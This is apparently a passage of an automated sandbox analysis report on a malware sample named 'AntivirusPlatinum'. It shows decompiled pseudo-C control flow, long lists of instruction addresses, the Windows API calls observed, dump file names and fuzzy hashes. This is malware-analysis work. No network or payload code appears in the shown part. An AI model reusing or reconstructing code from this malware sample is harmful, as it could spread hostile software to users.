                                                                                                                                                              												 *0x41a820 = E0040B7BA(__esi, __eflags);
                                                                                                                                                              											}
                                                                                                                                                              											 *0x41a817 = 1;
                                                                                                                                                              											goto L152;
                                                                                                                                                              										case 9:
                                                                                                                                                              											L113:
                                                                                                                                                              											__eflags =  *(__ebp + 0x10) - 5;
                                                                                                                                                              											if( *(__ebp + 0x10) != 5) {
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											L114:
                                                                                                                                                              											_push(1);
                                                                                                                                                              											L87:
                                                                                                                                                              											__ebp - 0x1c34 = E0040BD80(__ebp - 0x1c34, __ecx); // executed
                                                                                                                                                              											goto L152;
                                                                                                                                                              										case 0xa:
                                                                                                                                                              											goto L0;
                                                                                                                                                              										case 0xb:
                                                                                                                                                              											L150:
                                                                                                                                                              											__eflags =  *(__ebp + 0x10) - 7;
                                                                                                                                                              											if( *(__ebp + 0x10) == 7) {
                                                                                                                                                              												 *0x419f90 = 1;
                                                                                                                                                              											}
                                                                                                                                                              											goto L152;
                                                                                                                                                              										case 0xc:
                                                                                                                                                              											L80:
                                                                                                                                                              											__eax =  *(__ebp - 0x1c34);
                                                                                                                                                              											__eax = E0040A250(__ecx,  *(__ebp - 0x1c34));
                                                                                                                                                              											__eflags = __eax - 0x46;
                                                                                                                                                              											if(__eax == 0x46) {
                                                                                                                                                              												 *0x419edd = 1;
                                                                                                                                                              											} else {
                                                                                                                                                              												__eflags = __eax - 0x55;
                                                                                                                                                              												if(__eax == 0x55) {
                                                                                                                                                              													 *0x419edc = 1;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *0x419edd = 0;
                                                                                                                                                              													 *0x419edc = 0;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											goto L152;
                                                                                                                                                              									}
                                                                                                                                                              									L2:
                                                                                                                                                              									_t232 = E0040A925(_t232,  *(_t309 - 4));
                                                                                                                                                              									 *(_t309 - 4) =  *(_t309 - 4) + 0x1000;
                                                                                                                                                              									_t9 = _t309 - 0xc;
                                                                                                                                                              									 *_t9 =  *((intOrPtr*)(_t309 - 0xc)) - 1;
                                                                                                                                                              									if( *_t9 != 0) {
                                                                                                                                                              										goto L2;
                                                                                                                                                              									} else {
                                                                                                                                                              										 *(_t309 - 4) =  *(_t309 - 4) & 0x00000000;
                                                                                                                                                              										goto L4;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								L153:
                                                                                                                                                              								return _t231;
                                                                                                                                                              							}
                                                                                                                                                              							goto L147;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					goto L152;
                                                                                                                                                              				}
                                                                                                                                                              			}







                                                                                                                                                              0x0040c78e
                                                                                                                                                              0x0040c78e
                                                                                                                                                              0x0040c78e
                                                                                                                                                              0x0040c78e
                                                                                                                                                              0x0040c792
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c798
                                                                                                                                                              0x0040c798
                                                                                                                                                              0x0040c7a0
                                                                                                                                                              0x0040c7a5
                                                                                                                                                              0x0040c7a5
                                                                                                                                                              0x0040c7a8
                                                                                                                                                              0x0040c7cd
                                                                                                                                                              0x0040c7aa
                                                                                                                                                              0x0040c7aa
                                                                                                                                                              0x0040c7aa
                                                                                                                                                              0x0040c7ad
                                                                                                                                                              0x0040c7c4
                                                                                                                                                              0x0040c7af
                                                                                                                                                              0x0040c7af
                                                                                                                                                              0x0040c7af
                                                                                                                                                              0x0040c7b0
                                                                                                                                                              0x0040c7bb
                                                                                                                                                              0x0040c7b2
                                                                                                                                                              0x0040c7b2
                                                                                                                                                              0x0040c7b2
                                                                                                                                                              0x0040c7b0
                                                                                                                                                              0x0040c7ad
                                                                                                                                                              0x0040c7db
                                                                                                                                                              0x0040c7e2
                                                                                                                                                              0x0040c7e9
                                                                                                                                                              0x0040c7f0
                                                                                                                                                              0x0040c7f5
                                                                                                                                                              0x0040c7fc
                                                                                                                                                              0x0040c83d
                                                                                                                                                              0x0040c846
                                                                                                                                                              0x0040c84b
                                                                                                                                                              0x0040c84d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c84f
                                                                                                                                                              0x0040c84f
                                                                                                                                                              0x0040c851
                                                                                                                                                              0x0040c858
                                                                                                                                                              0x0040c85e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c860
                                                                                                                                                              0x0040c860
                                                                                                                                                              0x0040c860
                                                                                                                                                              0x0040c862
                                                                                                                                                              0x0040c865
                                                                                                                                                              0x0040c86c
                                                                                                                                                              0x0040c86e
                                                                                                                                                              0x0040c875
                                                                                                                                                              0x0040c878
                                                                                                                                                              0x0040c87d
                                                                                                                                                              0x0040c87f
                                                                                                                                                              0x0040c8b1
                                                                                                                                                              0x0040c8b1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c8b1
                                                                                                                                                              0x0040c881
                                                                                                                                                              0x0040c881
                                                                                                                                                              0x0040c883
                                                                                                                                                              0x0040c886
                                                                                                                                                              0x0040c89a
                                                                                                                                                              0x0040c89a
                                                                                                                                                              0x0040c89a
                                                                                                                                                              0x0040c89b
                                                                                                                                                              0x0040c89b
                                                                                                                                                              0x0040c8a0
                                                                                                                                                              0x0040c8a1
                                                                                                                                                              0x0040c8a7
                                                                                                                                                              0x0040c8a7
                                                                                                                                                              0x0040c8a8
                                                                                                                                                              0x0040c8ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c8ad
                                                                                                                                                              0x0040c888
                                                                                                                                                              0x0040c888
                                                                                                                                                              0x0040c888
                                                                                                                                                              0x0040c88b
                                                                                                                                                              0x0040c88c
                                                                                                                                                              0x0040c892
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c892
                                                                                                                                                              0x0040c867
                                                                                                                                                              0x0040c867
                                                                                                                                                              0x0040c86a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c8b3
                                                                                                                                                              0x0040c8b3
                                                                                                                                                              0x0040c8b4
                                                                                                                                                              0x0040c8b4
                                                                                                                                                              0x0040c8b9
                                                                                                                                                              0x0040c8bb
                                                                                                                                                              0x0040c8bd
                                                                                                                                                              0x0040c8bd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c7fe
                                                                                                                                                              0x0040c7fe
                                                                                                                                                              0x0040c805
                                                                                                                                                              0x0040c813
                                                                                                                                                              0x0040c81a
                                                                                                                                                              0x0040c81f
                                                                                                                                                              0x0040c821
                                                                                                                                                              0x0040c827
                                                                                                                                                              0x0040c833
                                                                                                                                                              0x0040c833
                                                                                                                                                              0x0040c8c0
                                                                                                                                                              0x0040c8c0
                                                                                                                                                              0x0040c8c7
                                                                                                                                                              0x0040c8d0
                                                                                                                                                              0x0040c8d7
                                                                                                                                                              0x0040c8d7
                                                                                                                                                              0x0040c8e3
                                                                                                                                                              0x0040c8f2
                                                                                                                                                              0x0040c8f9
                                                                                                                                                              0x0040c905
                                                                                                                                                              0x0040c90a
                                                                                                                                                              0x0040c911
                                                                                                                                                              0x0040c91a
                                                                                                                                                              0x0040c926
                                                                                                                                                              0x0040c92d
                                                                                                                                                              0x0040c92d
                                                                                                                                                              0x0040c939
                                                                                                                                                              0x0040c940
                                                                                                                                                              0x0040c945
                                                                                                                                                              0x0040c94c
                                                                                                                                                              0x0040c952
                                                                                                                                                              0x0040c954
                                                                                                                                                              0x0040c954
                                                                                                                                                              0x0040c968
                                                                                                                                                              0x0040c96d
                                                                                                                                                              0x0040c974
                                                                                                                                                              0x0040c979
                                                                                                                                                              0x0040c97b
                                                                                                                                                              0x0040c98c
                                                                                                                                                              0x0040c998
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c97d
                                                                                                                                                              0x0040c97d
                                                                                                                                                              0x0040c983
                                                                                                                                                              0x0040c988
                                                                                                                                                              0x0040c98a
                                                                                                                                                              0x0040c99d
                                                                                                                                                              0x0040c9a8
                                                                                                                                                              0x0040c9b4
                                                                                                                                                              0x0040c9b6
                                                                                                                                                              0x0040c9b8
                                                                                                                                                              0x0040c9c1
                                                                                                                                                              0x0040c9c8
                                                                                                                                                              0x0040c9ca
                                                                                                                                                              0x0040c9cc
                                                                                                                                                              0x0040c9d5
                                                                                                                                                              0x0040c9dc
                                                                                                                                                              0x0040c9de
                                                                                                                                                              0x0040c9e0
                                                                                                                                                              0x0040c9e9
                                                                                                                                                              0x0040c9f7
                                                                                                                                                              0x0040c9fc
                                                                                                                                                              0x0040ca03
                                                                                                                                                              0x0040ca07
                                                                                                                                                              0x0040ca15
                                                                                                                                                              0x0040ca15
                                                                                                                                                              0x0040ca2a
                                                                                                                                                              0x0040ca2a
                                                                                                                                                              0x0040ca48
                                                                                                                                                              0x0040ca4d
                                                                                                                                                              0x0040ca52
                                                                                                                                                              0x0040bfe1
                                                                                                                                                              0x0040bff8
                                                                                                                                                              0x0040bffe
                                                                                                                                                              0x0040c001
                                                                                                                                                              0x0040c001
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c021
                                                                                                                                                              0x0040c03c
                                                                                                                                                              0x0040c043
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c045
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c045
                                                                                                                                                              0x0040c043
                                                                                                                                                              0x0040c04a
                                                                                                                                                              0x0040c04e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c054
                                                                                                                                                              0x0040c057
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c05e
                                                                                                                                                              0x0040c05e
                                                                                                                                                              0x0040c062
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c068
                                                                                                                                                              0x0040c074
                                                                                                                                                              0x0040c088
                                                                                                                                                              0x0040c094
                                                                                                                                                              0x0040c0a7
                                                                                                                                                              0x0040c0b2
                                                                                                                                                              0x0040c0c4
                                                                                                                                                              0x0040c0cf
                                                                                                                                                              0x0040c0d4
                                                                                                                                                              0x0040c0dd
                                                                                                                                                              0x0040c0e3
                                                                                                                                                              0x0040c0e8
                                                                                                                                                              0x0040c0ea
                                                                                                                                                              0x0040c256
                                                                                                                                                              0x0040c25c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c0f0
                                                                                                                                                              0x0040c0f0
                                                                                                                                                              0x0040c0f5
                                                                                                                                                              0x0040c0f5
                                                                                                                                                              0x0040c0fe
                                                                                                                                                              0x0040c104
                                                                                                                                                              0x0040c10b
                                                                                                                                                              0x0040c1bb
                                                                                                                                                              0x0040c1c2
                                                                                                                                                              0x0040c1c4
                                                                                                                                                              0x0040c1c7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c1c9
                                                                                                                                                              0x0040c1d0
                                                                                                                                                              0x0040c1d6
                                                                                                                                                              0x0040c1d8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c1da
                                                                                                                                                              0x0040c1da
                                                                                                                                                              0x0040c1dd
                                                                                                                                                              0x0040c1de
                                                                                                                                                              0x0040c1e6
                                                                                                                                                              0x0040c1f5
                                                                                                                                                              0x0040c1f7
                                                                                                                                                              0x0040c201
                                                                                                                                                              0x0040c203
                                                                                                                                                              0x0040c206
                                                                                                                                                              0x0040c1e0
                                                                                                                                                              0x0040c1e0
                                                                                                                                                              0x0040c1e0
                                                                                                                                                              0x0040c1e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c208
                                                                                                                                                              0x0040c216
                                                                                                                                                              0x0040c21c
                                                                                                                                                              0x0040c21e
                                                                                                                                                              0x0040c220
                                                                                                                                                              0x0040c225
                                                                                                                                                              0x0040c227
                                                                                                                                                              0x0040c234
                                                                                                                                                              0x0040c234
                                                                                                                                                              0x0040c227
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c21e
                                                                                                                                                              0x0040c206
                                                                                                                                                              0x0040c1d8
                                                                                                                                                              0x0040c111
                                                                                                                                                              0x0040c116
                                                                                                                                                              0x0040c119
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c11f
                                                                                                                                                              0x0040c12d
                                                                                                                                                              0x0040c139
                                                                                                                                                              0x0040c145
                                                                                                                                                              0x0040c14a
                                                                                                                                                              0x0040c14d
                                                                                                                                                              0x0040c150
                                                                                                                                                              0x0040c163
                                                                                                                                                              0x0040c16c
                                                                                                                                                              0x0040c171
                                                                                                                                                              0x0040c173
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c179
                                                                                                                                                              0x0040c187
                                                                                                                                                              0x0040c195
                                                                                                                                                              0x0040c19a
                                                                                                                                                              0x0040c19c
                                                                                                                                                              0x0040c19d
                                                                                                                                                              0x0040c1a7
                                                                                                                                                              0x0040c1ae
                                                                                                                                                              0x0040c1b5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c1b5
                                                                                                                                                              0x0040c152
                                                                                                                                                              0x0040c159
                                                                                                                                                              0x0040c15e
                                                                                                                                                              0x0040c161
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c23a
                                                                                                                                                              0x0040c23a
                                                                                                                                                              0x0040c243
                                                                                                                                                              0x0040c249
                                                                                                                                                              0x0040c24e
                                                                                                                                                              0x0040c24e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c0f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c266
                                                                                                                                                              0x0040c266
                                                                                                                                                              0x0040c26a
                                                                                                                                                              0x0040c270
                                                                                                                                                              0x0040c275
                                                                                                                                                              0x0040c277
                                                                                                                                                              0x0040c27a
                                                                                                                                                              0x0040c27c
                                                                                                                                                              0x0040c284
                                                                                                                                                              0x0040c284
                                                                                                                                                              0x0040c289
                                                                                                                                                              0x0040c289
                                                                                                                                                              0x0040c28d
                                                                                                                                                              0x0040c297
                                                                                                                                                              0x0040c29f
                                                                                                                                                              0x0040c28f
                                                                                                                                                              0x0040c28f
                                                                                                                                                              0x0040c28f
                                                                                                                                                              0x0040c2a1
                                                                                                                                                              0x0040c2a3
                                                                                                                                                              0x0040c2b4
                                                                                                                                                              0x0040c2a5
                                                                                                                                                              0x0040c2a5
                                                                                                                                                              0x0040c2a5
                                                                                                                                                              0x0040c2bc
                                                                                                                                                              0x0040c2c7
                                                                                                                                                              0x0040c2cc
                                                                                                                                                              0x0040c2d1
                                                                                                                                                              0x0040c2d3
                                                                                                                                                              0x0040c2d5
                                                                                                                                                              0x0040c2d5
                                                                                                                                                              0x0040c2d8
                                                                                                                                                              0x0040c2da
                                                                                                                                                              0x0040c2df
                                                                                                                                                              0x0040c2e3
                                                                                                                                                              0x0040c2ea
                                                                                                                                                              0x0040c2ea
                                                                                                                                                              0x0040c2e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c2f4
                                                                                                                                                              0x0040c2f4
                                                                                                                                                              0x0040c2f8
                                                                                                                                                              0x0040c308
                                                                                                                                                              0x0040c308
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c313
                                                                                                                                                              0x0040c313
                                                                                                                                                              0x0040c317
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c31d
                                                                                                                                                              0x0040c31d
                                                                                                                                                              0x0040c324
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c32a
                                                                                                                                                              0x0040c32a
                                                                                                                                                              0x0040c331
                                                                                                                                                              0x0040c337
                                                                                                                                                              0x0040c33e
                                                                                                                                                              0x0040c340
                                                                                                                                                              0x0040c340
                                                                                                                                                              0x0040c347
                                                                                                                                                              0x0040c34c
                                                                                                                                                              0x0040c351
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c357
                                                                                                                                                              0x0040c357
                                                                                                                                                              0x0040c357
                                                                                                                                                              0x0040c359
                                                                                                                                                              0x0040c35b
                                                                                                                                                              0x0040c408
                                                                                                                                                              0x0040c408
                                                                                                                                                              0x0040c40a
                                                                                                                                                              0x0040c36e
                                                                                                                                                              0x0040c376
                                                                                                                                                              0x0040c37b
                                                                                                                                                              0x0040c37d
                                                                                                                                                              0x0040c384
                                                                                                                                                              0x0040c389
                                                                                                                                                              0x0040c38b
                                                                                                                                                              0x0040c38d
                                                                                                                                                              0x0040c391
                                                                                                                                                              0x0040c393
                                                                                                                                                              0x0040c393
                                                                                                                                                              0x0040c391
                                                                                                                                                              0x0040c39e
                                                                                                                                                              0x0040c3aa
                                                                                                                                                              0x0040c3ba
                                                                                                                                                              0x0040c3c4
                                                                                                                                                              0x0040c3d3
                                                                                                                                                              0x0040c3d9
                                                                                                                                                              0x0040c3e1
                                                                                                                                                              0x0040c3e6
                                                                                                                                                              0x0040c3e8
                                                                                                                                                              0x0040c3fd
                                                                                                                                                              0x0040c3fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c3e8
                                                                                                                                                              0x0040c410
                                                                                                                                                              0x0040c410
                                                                                                                                                              0x0040c412
                                                                                                                                                              0x0040c41e
                                                                                                                                                              0x0040c41e
                                                                                                                                                              0x0040c430
                                                                                                                                                              0x0040c436
                                                                                                                                                              0x0040c438
                                                                                                                                                              0x0040c43e
                                                                                                                                                              0x0040c445
                                                                                                                                                              0x0040c453
                                                                                                                                                              0x0040c463
                                                                                                                                                              0x0040c463
                                                                                                                                                              0x0040c469
                                                                                                                                                              0x0040c470
                                                                                                                                                              0x0040c472
                                                                                                                                                              0x0040c479
                                                                                                                                                              0x0040c47e
                                                                                                                                                              0x0040c484
                                                                                                                                                              0x0040c485
                                                                                                                                                              0x0040c489
                                                                                                                                                              0x0040c497
                                                                                                                                                              0x0040c497
                                                                                                                                                              0x0040c489
                                                                                                                                                              0x0040c4a2
                                                                                                                                                              0x0040c4a4
                                                                                                                                                              0x0040c4b0
                                                                                                                                                              0x0040c4b2
                                                                                                                                                              0x0040c4b8
                                                                                                                                                              0x0040c4c6
                                                                                                                                                              0x0040c4c6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c4b8
                                                                                                                                                              0x0040c414
                                                                                                                                                              0x0040c414
                                                                                                                                                              0x0040c418
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c418
                                                                                                                                                              0x0040c361
                                                                                                                                                              0x0040c361
                                                                                                                                                              0x0040c365
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c36b
                                                                                                                                                              0x0040c36b
                                                                                                                                                              0x0040c36b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c36b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c4d0
                                                                                                                                                              0x0040c4d0
                                                                                                                                                              0x0040c4d1
                                                                                                                                                              0x0040c4d6
                                                                                                                                                              0x0040c4d8
                                                                                                                                                              0x0040c4db
                                                                                                                                                              0x0040c4db
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c511
                                                                                                                                                              0x0040c511
                                                                                                                                                              0x0040c518
                                                                                                                                                              0x0040c518
                                                                                                                                                              0x0040c51b
                                                                                                                                                              0x0040c548
                                                                                                                                                              0x0040c548
                                                                                                                                                              0x0040c54f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c54f
                                                                                                                                                              0x0040c51d
                                                                                                                                                              0x0040c51d
                                                                                                                                                              0x0040c51d
                                                                                                                                                              0x0040c520
                                                                                                                                                              0x0040c535
                                                                                                                                                              0x0040c535
                                                                                                                                                              0x0040c53c
                                                                                                                                                              0x0040c53c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c53c
                                                                                                                                                              0x0040c522
                                                                                                                                                              0x0040c522
                                                                                                                                                              0x0040c522
                                                                                                                                                              0x0040c523
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c525
                                                                                                                                                              0x0040c525
                                                                                                                                                              0x0040c525
                                                                                                                                                              0x0040c526
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c52c
                                                                                                                                                              0x0040c52c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c59d
                                                                                                                                                              0x0040c59d
                                                                                                                                                              0x0040c5a1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c5a7
                                                                                                                                                              0x0040c5a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c5b9
                                                                                                                                                              0x0040c5b9
                                                                                                                                                              0x0040c5bd
                                                                                                                                                              0x0040c71c
                                                                                                                                                              0x0040c71c
                                                                                                                                                              0x0040c720
                                                                                                                                                              0x0040c726
                                                                                                                                                              0x0040c72d
                                                                                                                                                              0x0040c72f
                                                                                                                                                              0x0040c72f
                                                                                                                                                              0x0040c739
                                                                                                                                                              0x0040c739
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c720
                                                                                                                                                              0x0040c5c3
                                                                                                                                                              0x0040c5cf
                                                                                                                                                              0x0040c5dc
                                                                                                                                                              0x0040c5e1
                                                                                                                                                              0x0040c5e5
                                                                                                                                                              0x0040c5e7
                                                                                                                                                              0x0040c5f4
                                                                                                                                                              0x0040c5f4
                                                                                                                                                              0x0040c5f4
                                                                                                                                                              0x0040c5fa
                                                                                                                                                              0x0040c600
                                                                                                                                                              0x0040c601
                                                                                                                                                              0x0040c607
                                                                                                                                                              0x0040c608
                                                                                                                                                              0x0040c609
                                                                                                                                                              0x0040c60b
                                                                                                                                                              0x0040c60e
                                                                                                                                                              0x0040c614
                                                                                                                                                              0x0040c615
                                                                                                                                                              0x0040c617
                                                                                                                                                              0x0040c61a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c5ee
                                                                                                                                                              0x0040c5ee
                                                                                                                                                              0x0040c5ee
                                                                                                                                                              0x0040c5ee
                                                                                                                                                              0x0040c5f1
                                                                                                                                                              0x0040c5f1
                                                                                                                                                              0x0040c61c
                                                                                                                                                              0x0040c628
                                                                                                                                                              0x0040c62e
                                                                                                                                                              0x0040c635
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c63b
                                                                                                                                                              0x0040c63b
                                                                                                                                                              0x0040c642
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c648
                                                                                                                                                              0x0040c64a
                                                                                                                                                              0x0040c651
                                                                                                                                                              0x0040c658
                                                                                                                                                              0x0040c65d
                                                                                                                                                              0x0040c65f
                                                                                                                                                              0x0040c69f
                                                                                                                                                              0x0040c69f
                                                                                                                                                              0x0040c6a6
                                                                                                                                                              0x0040c6af
                                                                                                                                                              0x0040c6bb
                                                                                                                                                              0x0040c6c9
                                                                                                                                                              0x0040c6c9
                                                                                                                                                              0x0040c6d5
                                                                                                                                                              0x0040c6e3
                                                                                                                                                              0x0040c6ed
                                                                                                                                                              0x0040c6f4
                                                                                                                                                              0x0040c6fa
                                                                                                                                                              0x0040c6fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c703
                                                                                                                                                              0x0040c703
                                                                                                                                                              0x0040c705
                                                                                                                                                              0x0040c705
                                                                                                                                                              0x0040c70a
                                                                                                                                                              0x0040c711
                                                                                                                                                              0x0040c716
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c716
                                                                                                                                                              0x0040c6fd
                                                                                                                                                              0x0040c661
                                                                                                                                                              0x0040c661
                                                                                                                                                              0x0040c663
                                                                                                                                                              0x0040c66a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c66c
                                                                                                                                                              0x0040c66c
                                                                                                                                                              0x0040c66c
                                                                                                                                                              0x0040c674
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c676
                                                                                                                                                              0x0040c676
                                                                                                                                                              0x0040c677
                                                                                                                                                              0x0040c67f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c681
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c681
                                                                                                                                                              0x0040c683
                                                                                                                                                              0x0040c68b
                                                                                                                                                              0x0040c692
                                                                                                                                                              0x0040c697
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c745
                                                                                                                                                              0x0040c745
                                                                                                                                                              0x0040c749
                                                                                                                                                              0x0040c74b
                                                                                                                                                              0x0040c752
                                                                                                                                                              0x0040c75e
                                                                                                                                                              0x0040c75e
                                                                                                                                                              0x0040c764
                                                                                                                                                              0x0040c76c
                                                                                                                                                              0x0040c76c
                                                                                                                                                              0x0040c771
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c77d
                                                                                                                                                              0x0040c77d
                                                                                                                                                              0x0040c781
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c787
                                                                                                                                                              0x0040c787
                                                                                                                                                              0x0040c5a9
                                                                                                                                                              0x0040c5af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ca1d
                                                                                                                                                              0x0040ca1d
                                                                                                                                                              0x0040ca21
                                                                                                                                                              0x0040ca23
                                                                                                                                                              0x0040ca23
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c55b
                                                                                                                                                              0x0040c55b
                                                                                                                                                              0x0040c563
                                                                                                                                                              0x0040c568
                                                                                                                                                              0x0040c56b
                                                                                                                                                              0x0040c591
                                                                                                                                                              0x0040c56d
                                                                                                                                                              0x0040c56d
                                                                                                                                                              0x0040c570
                                                                                                                                                              0x0040c585
                                                                                                                                                              0x0040c572
                                                                                                                                                              0x0040c572
                                                                                                                                                              0x0040c579
                                                                                                                                                              0x0040c579
                                                                                                                                                              0x0040c570
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c008
                                                                                                                                                              0x0040c00c
                                                                                                                                                              0x0040c011
                                                                                                                                                              0x0040c018
                                                                                                                                                              0x0040c018
                                                                                                                                                              0x0040c01b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c01d
                                                                                                                                                              0x0040c01d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c01d
                                                                                                                                                              0x0040c01b
                                                                                                                                                              0x0040ca58
                                                                                                                                                              0x0040ca5c
                                                                                                                                                              0x0040ca5c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c98a
                                                                                                                                                              0x0040c97b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c7fc

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A250: OemToCharBuffA.USER32 ref: 0040A25E
                                                                                                                                                                • Part of subcall function 0040A250: CharUpperA.USER32(00000000,?,?,0040B53D,?,00000000,00000000,746561F0,00000000,00000000), ref: 0040A269
                                                                                                                                                                • Part of subcall function 0040A250: CharToOemBuffA.USER32 ref: 0040A27C
                                                                                                                                                              • SHChangeNotify.SHELL32(00001000,00000001,00000000,00000000), ref: 0040CA15
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char$Buff$ChangeNotifyUpper
                                                                                                                                                              • String ID: $"$.lnk$/$/
                                                                                                                                                              • API String ID: 3722132714-4221205064
                                                                                                                                                              • Opcode ID: 27bf3f6fec95a07f86dd67e8e14781f846cc3590ad8cb4fe44e6cc38865bcf63
                                                                                                                                                              • Instruction ID: ac79738b4ffa8067dea208a906377ff97dd7469831f8120efdd6494ba044edeb
                                                                                                                                                              • Opcode Fuzzy Hash: 27bf3f6fec95a07f86dd67e8e14781f846cc3590ad8cb4fe44e6cc38865bcf63
                                                                                                                                                              • Instruction Fuzzy Hash: AB7181B290525CA9EB21E7A0CD85BDAB7BC9B04304F0445F7A145F6182DB78AB88CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
